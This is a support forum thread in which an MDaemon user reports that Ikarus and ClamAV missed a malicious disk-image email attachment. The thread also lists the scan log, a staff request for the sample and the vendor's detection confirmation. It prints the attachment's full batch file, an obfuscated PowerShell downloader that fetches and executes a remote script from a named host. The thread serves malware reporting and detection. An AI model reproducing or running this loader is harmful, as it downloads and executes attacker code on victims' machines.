Virus not detected by both Ikarus and Clam | MDaemon Technologies, Ltd.
  1. Forum
  2. MDaemon
  3. Virus not detected by both Ikarus and Clam

Virus not detected by both Ikarus and Clam

  • L

    Hi,

    running latest version of Mdaemon and Antivirus plugin. Today an email with a disk image attachment (.img file) containing a batch file ( PowerShell/TrojanDownloader.Agent trojan) has been passed without blocking it. Fortunately the Eset antivirus on the clien'ts endpoint detected it.

    Here the Mdaemon antivirus log:

    -Mon 2024-02-19 07:43:40.120: * IKARUS AV: clean  (0.020 s) doc20241902070611.img (C:\MDaemon\CFilter\TEMP\3141324088\pd82059750.att)
    -Mon 2024-02-19 07:43:40.764: * ClamAV: clean  (0.643 s) doc20241902070611.img (C:\MDaemon\CFilter\TEMP\3141324088\pd82059750.att)

    and here the batch file hidden in the attachment:

    @echo off
    set rt0=pAoAwAeArAsAhAeAlAl

    set rt0=%rt0:A=%
    Set message=$rt='x','e','I';[Array]::Reverse($rt);sal z ($rt -join '');$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType
    set message2=], 3072);[System.Net.ServicePointManager]::SecurityProto
    set message3=col = $t56fg;$tpg='[void','] [Syst','em.Refle','ction.Asse','mbly]::LoadWi','thParti
    set message4=alName(''Microsoft.VisualBasic'')';z($tpg -join '');do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);
    set message5=$tty55='(New-','Obje','ct Ne','t.We','bCli','ent)';$tty=z($tty55 -join '');$tt
    set message6=y;$rot='Down','load','str','ing';$rotJ=($rot -join '');$bnt='https','://antuofermo.it/G12.txt';$bng0=($bnt -join '');$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,$rotJ,[Microsoft.VisualBasic.CallType]::Method,$bng0);z($mv)

    start /min %rt0% %message%%message2%%message3%%message4%%message5%%message6%

    0 likes
  • A

    Please put the original MSG file in a password protected zip file and email it to virusfn@mdaemon.com.  Please be user to include the password in your email.

     

    --
    Arron Caruth

    0 likes
  • L

    "This malware has been classified as a virus since yesterday and is detected accordingly."

    ----------------------------------
    IKARUS Security Software GmbH
    Blechturmgasse 11, A-1050 Wien
    Web: https://www.ikarussecurity.com
    ----------------------------------

    0 likes
  • A

    Thank you for letting us know!

    --
    Arron Caruth

    0 likes
Please login to reply this topic!